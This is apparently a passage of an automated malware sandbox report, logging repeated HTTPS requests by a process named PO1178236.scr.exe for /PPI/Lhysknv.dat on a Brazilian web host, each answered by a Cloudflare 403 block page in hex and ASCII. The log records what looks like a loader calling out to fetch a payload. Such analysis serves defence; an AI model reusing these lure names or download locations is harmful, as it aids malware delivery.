        2025-01-09 07:36:09 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:09 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 33 32 36 62 63 62 38 63 34 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1326bcb8c41</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:09 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 33 32 36 62 63 62 38 63 34 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1326bcb8c41',t:'MTczNjQwODE2OS4wMDAwMDA='}
        2025-01-09 07:36:09 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        22192.168.2.949730188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:09 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:10 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:09 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:24 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJHL2H0lo5BwbcYUkCuXKtnz5YPUIaRny2QVp2cCsr1qhkiJRMMxnxWHD239PyoBJwXti3FwmymRQQrIIVnqN%2FhmI8z8uT6ExVgJA8cbt11%2B4rCbutwfEqc5mzRivVWS9%2BQ7NwcOnR1uFhAs"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1362fc58ce6-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2005&rtt_var=764&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1420233&cwnd=162&unsent_bytes=0&cid=38c9b01a41d7afd4&ts=126&x=0"
        2025-01-09 07:36:10 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:10 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:10 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:10 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 33 36 32 66 63 35 38 63 65 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1362fc58ce6</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:10 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 33 36 32 66 63 35 38 63 65 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1362fc58ce6',t:'MTczNjQwODE2OS4wMDAwMDA='};var a
        2025-01-09 07:36:10 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        23192.168.2.949731188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:10 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:10 UTC1008INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:10 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:25 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jjdXrnUZtLohCFAZUrgGRzwxzAI4DdtNGidJLfkEOmzITh21Q2j%2BtiU%2F%2BDeIAVoEF7tKYQiGQxgqI1RYHxr%2FINZLjyl1PKXDrPEqBOqt%2F4g2E50K7pJmU6iyzuYBLUCJB9XwqMSoEXnzMgei"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c13a18464375-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1645&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1775075&cwnd=32&unsent_bytes=0&cid=d61daadfac522426&ts=151&x=0"
        2025-01-09 07:36:10 UTC361INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:10 UTC1369INData Raw: 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64
        Data Ascii: dflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=d
        2025-01-09 07:36:10 UTC1369INData Raw: 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61
        Data Ascii: n cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.ca
        2025-01-09 07:36:10 UTC1369INData Raw: 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 33 61 31 38 34 36 34 33 37 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
        Data Ascii: t-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c13a18464375</strong></span> <span class="cf-footer-separator sm:hidde
        2025-01-09 07:36:10 UTC1001INData Raw: 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 33 61 31 38 34 36 34 33 37 35 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61
        Data Ascii: indow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c13a18464375',t:'MTczNjQwODE3MC4wMDAwMDA='};va
        2025-01-09 07:36:10 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        24192.168.2.949732188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:11 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:11 UTC1001INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:11 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:26 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNyukV7NODgGTGhxN8pODZUXP7aYzTZ5iPFVILpuNTnV8r2swxnKHye5RQxzFhCrjV505GX1zA72SFkxkKIEzFug1WYnZLXnKmB6zH8GXZSe5UuZiXZTXL%2FDReITAujiGYWKfbCbQ4r0WvWo"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c13dea6a43fb-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1582&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1782661&cwnd=180&unsent_bytes=0&cid=7c40cab20d4d5267&ts=146&x=0"
        2025-01-09 07:36:11 UTC368INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:11 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77
        Data Ascii: /title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-w
        2025-01-09 07:36:11 UTC1369INData Raw: 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63
        Data Ascii: ghlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-c
        2025-01-09 07:36:11 UTC1369INData Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 33 64 65 61 36 61 34 33 66 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 